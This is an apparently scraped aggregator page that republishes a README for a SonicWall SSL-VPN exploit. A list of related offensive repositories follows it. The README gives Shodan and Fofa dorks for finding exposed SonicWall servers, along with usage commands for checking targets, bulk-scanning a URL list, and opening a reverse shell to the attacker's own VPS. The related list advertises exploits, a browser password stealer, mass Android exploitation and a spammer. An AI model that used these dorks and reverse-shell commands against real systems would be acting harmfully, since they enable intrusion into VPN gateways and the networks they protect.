SonicWALL SSL-VPN Web Server Vulnerable Exploit

Last update: Nov 15, 2022

Overview

SonicWall_SSL-VPN_EXP

SonicWALL SSL-VPN Web Server Vulnerable Exploit

Dork

Shodan:

http.favicon.hash:-1153950306

http.favicon.hash:-2012355198

Fofa:

(body="login_box_sonicwall" || header="SonicWALL SSL-VPN Web Server") && body="SSL-VPN"

Usage

vulnerability verification for individual websites

python POC.py -u https://1.1.1.1

reverse shell to your VPS host

python POC.py -e https://1.1.1.1 -rh 2.2.2.2 -rp 9999

perform vulnerability checks on multiple websites in a file, and the vulnerable websites will be output to the success.txt file

python3 POC.py -f urls.txt

Reference

https://twitter.com/chybeta/status/1353974652540882944

https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/

SSL / TLS Checking Tool written in Python3

ssts-chk SSL / TLS Checking Tool written in Python3. This tool will perform the following functions: Connect the target given Analyze the secure conne

2 Feb 12, 2022

ProxyShell POC Exploit : Exchange Server RCE (ACL Bypass + EoP + Arbitrary File Write)

ProxyShell Install git clone https://github.com/ktecv2000/ProxyShell cd ProxyShell virtualenv -p $(which python3) venv source venv/bin/activate pip3 i

312 Dec 9, 2022

Chrome Post-Exploitation is a client-server Chrome exploit to remotely allow an attacker access to Chrome passwords, downloads, history, and more.

ChromePE [Linux/Windows] Chrome Post-Exploitation is a client-server Chrome exploit to remotely allow an attacker access to Chrome passwords, download

3 Oct 5, 2022

A small Minecraft server to help players detect vulnerability to the Log4Shell exploit 🐚

log4check A small Minecraft server to help players detect vulnerability to the Log4Shell exploit 🐚 Tested to work between Minecraft versions 1.12.2 a

4 Dec 23, 2021

VPN Overall Reconnaissance, Testing, Enumeration and eXploitation Toolkit

Vortex VPN Overall Reconnaissance, Testing, Enumeration and Exploitation Toolkit Overview A very simple Python framework, inspired by SprayingToolkit,

315 Dec 28, 2022

Strapi Framework Vulnerable to Remote Code Execution

CVE-2019-19609 Strapi Framework Vulnerable to Remote Code Execution well, I didnt found any exploit for CVE-2019-19609 so I wrote one. :/ Usage pytho

7 Mar 8, 2022

OMIGOD! OM I GOOD? A free scanner to detect VMs vulnerable to one of the

omigood (OM I GOOD?) This repository contains a free scanner to detect VMs vulnerable to one of the "OMIGOD" vulnerabilities discovered by Wiz's threa

13 Jul 13, 2022

Proof of concept to check if hosts are vulnerable to CVE-2021-41773

CVE-2021-41773 PoC Proof of concept to check if hosts are vulnerable to CVE-2021-41773. Description (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CV

43 Nov 9, 2022

OpenSource Poc && Vulnerable-Target Storage Box.

reapoc OpenSource Poc && Vulnerable-Target Storage Box. We are aming to collect different normalized poc and the vulerable target to verify it. Now re

560 Dec 23, 2022

Owner

GitHub

adb - A tool that allows you to search for vulnerable android devices across the world and exploit them.

adb - An exploitation tool for android devices. A tool that allows you to search for vulnerable android devices across the world and exploit them. Fea

136 Jan 2, 2023

MongoDB-Injection - This challenge-script is custom-made for web-server running MongoDB which is vulnerable to No-SQL injection

MongoDB-Injection Cheesy Multi-threaded script for NoSQL Injection This challeng

2 Jun 6, 2022

Log4Shell RCE Exploit - fully independent exploit does not require any 3rd party binaries.

Log4Shell RCE Exploit fully independent exploit does not require any 3rd party binaries. The exploit spraying the payload to all possible logged HTTP

258 Jan 2, 2023

log4j2 dos exploit,CVE-2021-45105 exploit,Denial of Service poc

说明 about author: 我超怕的 blog: https://www.cnblogs.com/iAmSoScArEd/ github: https://github.com/iAmSOScArEd/ date: 2021-12-20 log4j2 dos exploit log4j2 do

3 Aug 13, 2022

Tinyman exploit finder - Tinyman exploit finder for python

tinyman_exploit_finder There was a big tinyman exploit. You can read about it he

9 Dec 27, 2022

Discord-email-spammer-exploit - A discord email spammer exploit with python

Discord-email-spammer-exploit was made by Love ❌ code ✅ ?? ・Description First it

25 Aug 13, 2022

Transparent proxy server that works as a poor man's VPN. Forwards over ssh. Doesn't require admin. Works with Linux and MacOS. Supports DNS tunneling.

sshuttle: where transparent proxy meets VPN meets ssh As far as I know, sshuttle is the only program that solves the following common case: Your clien

9.4k Jan 4, 2023

Wireguard VPN Server Installer for: on Ubuntu, Debian, Arch, Fedora and CentOS

XGuard (Wireguard Server Installer) This Python script should make the installation of a Wireguard VPN server as easy as possible. Wireguard is a mode

3 Nov 4, 2022

command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.

CVE-2021-36260 CVE-2021-36260 POC command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validatio

165 Dec 21, 2022

Searches for potentially vulnerable websites to local file inclusion, throughout the web and then exploits them for LFI

LFI-Hunter Searches for potentially vulnerable websites to local file inclusion, throughout the web and then exploits them for LFI A script written in

6 Jan 30, 2022

SonicWALL SSL-VPN Web Server Vulnerable Exploit

Related tags

Overview

SonicWall_SSL-VPN_EXP

Dork

Usage

Reference

You might also like...

SSL / TLS Checking Tool written in Python3

ProxyShell POC Exploit : Exchange Server RCE (ACL Bypass + EoP + Arbitrary File Write)

Chrome Post-Exploitation is a client-server Chrome exploit to remotely allow an attacker access to Chrome passwords, downloads, history, and more.

A small Minecraft server to help players detect vulnerability to the Log4Shell exploit 🐚

VPN Overall Reconnaissance, Testing, Enumeration and eXploitation Toolkit

Strapi Framework Vulnerable to Remote Code Execution

OMIGOD! OM I GOOD? A free scanner to detect VMs vulnerable to one of the

Proof of concept to check if hosts are vulnerable to CVE-2021-41773

OpenSource Poc && Vulnerable-Target Storage Box.

Owner

adb - A tool that allows you to search for vulnerable android devices across the world and exploit them.

MongoDB-Injection - This challenge-script is custom-made for web-server running MongoDB which is vulnerable to No-SQL injection

Log4Shell RCE Exploit - fully independent exploit does not require any 3rd party binaries.

log4j2 dos exploit,CVE-2021-45105 exploit,Denial of Service poc

Tinyman exploit finder - Tinyman exploit finder for python

Discord-email-spammer-exploit - A discord email spammer exploit with python

Transparent proxy server that works as a poor man's VPN. Forwards over ssh. Doesn't require admin. Works with Linux and MacOS. Supports DNS tunneling.

Wireguard VPN Server Installer for: on Ubuntu, Debian, Arch, Fedora and CentOS

command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.

Searches for potentially vulnerable websites to local file inclusion, throughout the web and then exploits them for LFI